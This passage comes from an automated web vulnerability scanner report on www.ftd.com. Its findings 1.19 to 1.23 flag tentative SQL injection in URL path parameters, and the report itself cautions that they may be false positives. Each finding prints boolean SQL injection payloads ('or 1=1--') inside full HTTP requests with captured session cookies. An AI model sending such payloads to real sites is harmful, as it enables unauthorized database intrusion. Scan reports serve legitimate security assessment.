Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:01:21 GMT
X-Varnish: 869409779
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...
1.19. http://www.ftd.com/empty/index.epl [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /empty/index.epl

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11276003'%20or%201%3d1--%20 and 11276003'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /empty/index.epl11276003'%20or%201%3d1--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 419
Date: Mon, 09 May 2011 01:03:13 GMT
X-Varnish: 1301377694
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 1301377694</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /empty/index.epl11276003'%20or%201%3d2--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:03:14 GMT
X-Varnish: 540321110
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...
1.20. http://www.ftd.com/empty/tealeaf.epl [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /empty/tealeaf.epl

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 17774407'%20or%201%3d1--%20 and 17774407'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /empty17774407'%20or%201%3d1--%20/tealeaf.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
X-TeaLeaf-Page-Objects: 0
Origin: http://www.ftd.com
X-TeaLeaf-Page-Img-Fail: 3
X-TeaLeaf-Page-Render: 9226
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.04.03.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902864856
Content-Length: 1245

<ClientEvent count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID20H0M25S760R0.6967325278092176" TimeDuration="9226" DateSince1970="1304902834986" >
<Info PageLoadMilliSecs="9226" Version="2009.0
...[SNIP]...

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:06:40 GMT
X-Varnish: 750156331
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 750156331</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

POST /empty17774407'%20or%201%3d2--%20/tealeaf.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
X-TeaLeaf-Page-Objects: 0
Origin: http://www.ftd.com
X-TeaLeaf-Page-Img-Fail: 3
X-TeaLeaf-Page-Render: 9226
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.04.03.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902864856
Content-Length: 1245

<ClientEvent count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID20H0M25S760R0.6967325278092176" TimeDuration="9226" DateSince1970="1304902834986" >
<Info PageLoadMilliSecs="9226" Version="2009.0
...[SNIP]...

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123193
Date: Mon, 09 May 2011 01:06:41 GMT
X-Varnish: 540333250
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...
1.21. http://www.ftd.com/empty/tealeaf.epl [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /empty/tealeaf.epl

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14521499'%20or%201%3d1--%20 and 14521499'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /empty/tealeaf.epl14521499'%20or%201%3d1--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
X-TeaLeaf-Page-Objects: 0
Origin: http://www.ftd.com
X-TeaLeaf-Page-Img-Fail: 3
X-TeaLeaf-Page-Render: 9226
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.04.03.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902864856
Content-Length: 1245

<ClientEvent count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID20H0M25S760R0.6967325278092176" TimeDuration="9226" DateSince1970="1304902834986" >
<Info PageLoadMilliSecs="9226" Version="2009.0
...[SNIP]...

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:08:34 GMT
X-Varnish: 729992096
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 729992096</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

POST /empty/tealeaf.epl14521499'%20or%201%3d2--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
X-TeaLeaf-Page-Objects: 0
Origin: http://www.ftd.com
X-TeaLeaf-Page-Img-Fail: 3
X-TeaLeaf-Page-Render: 9226
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.04.03.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902864856
Content-Length: 1245

<ClientEvent count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID20H0M25S760R0.6967325278092176" TimeDuration="9226" DateSince1970="1304902834986" >
<Info PageLoadMilliSecs="9226" Version="2009.0
...[SNIP]...

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123193
Date: Mon, 09 May 2011 01:08:35 GMT
X-Varnish: 1301398466
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe
...[SNIP]...
1.22. http://www.ftd.com/pics/counter.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /pics/counter.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15813113'%20or%201%3d1--%20 and 15813113'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /pics15813113'%20or%201%3d1--%20/counter.gif?markcode=351 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; fsr.a=1304902828764; c1=%7B%22referrer_before_redirect%22%3A%22%22%2C%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:06:31 GMT
X-Varnish: 869426411
Age: 13
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 869426411</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /pics15813113'%20or%201%3d2--%20/counter.gif?markcode=351 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; fsr.a=1304902828764; c1=%7B%22referrer_before_redirect%22%3A%22%22%2C%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123191
Date: Mon, 09 May 2011 01:06:32 GMT
X-Varnish: 869427079
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...
1.23. http://www.ftd.com/pics/counter.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /pics/counter.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 17406797'%20or%201%3d1--%20 and 17406797'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /pics/counter.gif17406797'%20or%201%3d1--%20?markcode=351 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; fsr.a=1304902828764; c1=%7B%22referrer_before_redirect%22%3A%22%22%2C%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:08:33 GMT
X-Varnish: 729991704
Age: 20
Via: 1.1 varnish
Connection: close


